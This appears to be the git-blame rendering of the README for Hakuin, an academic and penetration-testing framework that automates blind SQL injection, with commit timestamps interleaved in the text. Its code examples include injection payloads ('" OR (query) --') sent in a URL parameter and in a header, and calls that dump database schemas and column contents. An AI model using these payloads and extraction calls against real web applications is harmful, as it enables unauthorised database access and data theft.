2023-09-03 09:22:35 +02:00
< p align = "center" >
< img width = "150" src = "https://raw.githubusercontent.com/pruzko/hakuin/main/logo.png" >
< / p >
2023-09-02 06:32:42 +02:00
2024-01-07 17:19:56 +01:00
Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstract away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, such as pre-trained and adaptive language models, opportunistic guessing, parallelism and more.
2023-09-02 06:32:42 +02:00
2023-10-29 10:05:38 +01:00
Hakuin has been presented at esteemed academic and industrial conferences:
- [BlackHat MEA, Riyadh ](https://blackhatmea.com/session/hakuin-injecting-brain-blind-sql-injection ), 2023
2023-09-02 06:32:42 +02:00
- [Hack in the Box, Phuket ](https://conference.hitb.org/hitbsecconf2023hkt/session/hakuin-injecting-brains-into-blind-sql-injection/ ), 2023
2023-10-29 10:05:38 +01:00
- [IEEE S&P Workshop on Offsensive Technology (WOOT) ](https://wootconference.org/papers/woot23-paper17.pdf ), 2023
2023-09-02 06:32:42 +02:00
2023-10-29 10:05:38 +01:00
More information can be found in our [paper ](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_WOOT_23.pdf ) and [slides ](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_HITB_23.pdf ).
2022-08-15 04:51:48 +02:00
2023-03-23 08:53:36 +01:00
## Installation
To install Hakuin, simply run:
```
2023-09-05 11:08:15 +02:00
pip3 install hakuin
2023-09-05 11:06:11 +02:00
```
Developers should install the package locally and set the `-e` flag for editable mode:
```
2023-09-02 06:32:42 +02:00
git clone git@github.com:pruzko/hakuin.git
cd hakuin
2023-09-05 11:08:15 +02:00
pip3 install -e .
2023-03-23 08:53:36 +01:00
```
2022-08-15 04:51:48 +02:00
2023-03-23 08:53:36 +01:00
## Examples
2023-09-02 06:32:42 +02:00
Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the `Requester` and override the `request` method. Also, the method must determine whether the query resolved to `True` or `False` .
##### Example 1 - Query Parameter Injection with Status-based Inference
```python
2024-01-07 17:02:42 +01:00
import aiohttp
2023-03-23 08:53:36 +01:00
from hakuin import Requester
class StatusRequester(Requester):
2024-01-07 17:02:42 +01:00
async def request(self, ctx, query):
r = await aiohttp.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
return r.status == 200
2023-09-02 06:32:42 +02:00
```
2023-03-23 08:53:36 +01:00
2023-09-02 06:32:42 +02:00
##### Example 2 - Header Injection with Content-based Inference
```python
2023-03-23 08:53:36 +01:00
class ContentRequester(Requester):
2024-01-07 17:02:42 +01:00
async def request(self, ctx, query):
2023-09-02 06:32:42 +02:00
headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
2024-01-07 17:02:42 +01:00
r = await aiohttp.get(f'http://vuln.com/', headers=headers)
return 'found' in await r.text()
2023-03-23 08:53:36 +01:00
```
2024-01-07 17:02:42 +01:00
To start extracting data, use the `Extractor` class. It requires a `DBMS` object to contruct queries and a `Requester` object to inject them. Hakuin currently supports `SQLite` , `MySQL` , `PSQL` (PostgreSQL), and `MSSQL` (SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the `DBMS` interface defined in `hakuin/dbms/DBMS.py` .
2023-03-23 08:53:36 +01:00
2024-01-04 09:44:52 +01:00
##### Example 1 - Extracting SQLite/MySQL/PSQL/MSSQL
2023-09-02 06:32:42 +02:00
```python
2024-01-07 17:02:42 +01:00
import asyncio
2023-09-05 03:29:55 +02:00
from hakuin import Extractor, Requester
2024-01-07 17:02:42 +01:00
from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL
2023-03-23 08:53:36 +01:00
class StatusRequester(Requester):
...
2024-01-07 17:02:42 +01:00
async def main():
2024-01-07 17:19:56 +01:00
# requester: Use this Requester
# dbms: Use this DBMS
# n_tasks: Spawns N tasks that extract column rows in parallel
ext = await Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
2024-01-07 17:02:42 +01:00
...
if __name__ == '__main__':
asyncio.get_event_loop().run_until_complete(main())
2023-03-23 08:53:36 +01:00
```
2023-09-02 06:32:42 +02:00
2023-10-29 10:05:38 +01:00
Now that eveything is set, you can start extracting DB schemas.
2023-09-02 06:32:42 +02:00
2023-10-29 10:05:38 +01:00
##### Example 1 - Extracting DB Schemas
2023-09-02 06:32:42 +02:00
```python
2023-09-05 03:29:55 +02:00
# strategy:
# 'binary': Use binary search
# 'model': Use pre-trained models
2024-01-07 17:02:42 +01:00
schema = await ext.extract_schema(strategy='model')
2023-03-23 08:53:36 +01:00
```
2023-12-06 14:42:35 +01:00
##### Example 2 - Extracting only Table/Column Names
2023-09-02 06:32:42 +02:00
```python
2024-01-07 17:02:42 +01:00
tables = await ext.extract_table_names(strategy='model')
columns = await ext.extract_column_names(table='users', strategy='model')
2023-03-23 08:53:36 +01:00
```
2023-09-02 06:32:42 +02:00
Once you know the schema, you can extract the actual content.
2024-01-04 09:44:52 +01:00
##### Example 1 - Extracting Generic Columns
```python
# text_strategy: Use this strategy if the column is text
2024-01-07 17:02:42 +01:00
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
2024-01-04 09:44:52 +01:00
```
##### Example 2 - Extracting Textual Columns
2023-09-02 06:32:42 +02:00
```python
2023-09-05 03:29:55 +02:00
# strategy:
# 'binary': Use binary search
# 'fivegram': Use five-gram model
# 'unigram': Use unigram model
# 'dynamic': Dynamically identify the best strategy. This setting
# also enables opportunistic guessing.
2024-01-07 17:02:42 +01:00
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
2023-10-29 10:05:38 +01:00
```
2024-01-04 09:44:52 +01:00
##### Example 3 - Extracting Integer Columns
2023-10-29 10:05:38 +01:00
```python
2024-01-07 17:02:42 +01:00
res = await ext.extract_column_int(table='users', column='id')
2023-03-23 08:53:36 +01:00
```
2024-01-04 09:44:52 +01:00
##### Example 4 - Extracting Float Columns
2023-12-07 17:25:38 +01:00
```python
2024-01-07 17:02:42 +01:00
res = await ext.extract_column_float(table='products', column='price')
2023-12-07 17:25:38 +01:00
```
2024-01-04 09:44:52 +01:00
##### Example 5 - Extracting Blob (Binary Data) Columns
2023-12-07 17:25:38 +01:00
```python
2024-01-07 17:02:42 +01:00
res = await ext.extract_column_blob(table='users', column='id')
2023-12-07 17:25:38 +01:00
```
2023-09-02 06:32:42 +02:00
More examples can be found in the `tests` directory.
2023-03-23 08:53:36 +01:00
2023-12-08 17:24:20 +01:00
## Using Hakuin from the Command Line
2023-12-08 17:23:44 +01:00
Hakuin comes with a simple wrapper tool, `hk.py` , that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:
2023-12-08 17:22:00 +01:00
```
python3 hk.py -h
```
2023-09-02 06:32:42 +02:00
## For Researchers
2023-10-29 10:05:38 +01:00
This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the [frozen version ](https://zenodo.org/record/7804243 ) as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.
2023-09-02 06:32:42 +02:00
#### Cite Hakuin
```
@inproceedings {hakuin_bsqli,
title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
pages={384--393},
year={2023},
organization={IEEE}
}
```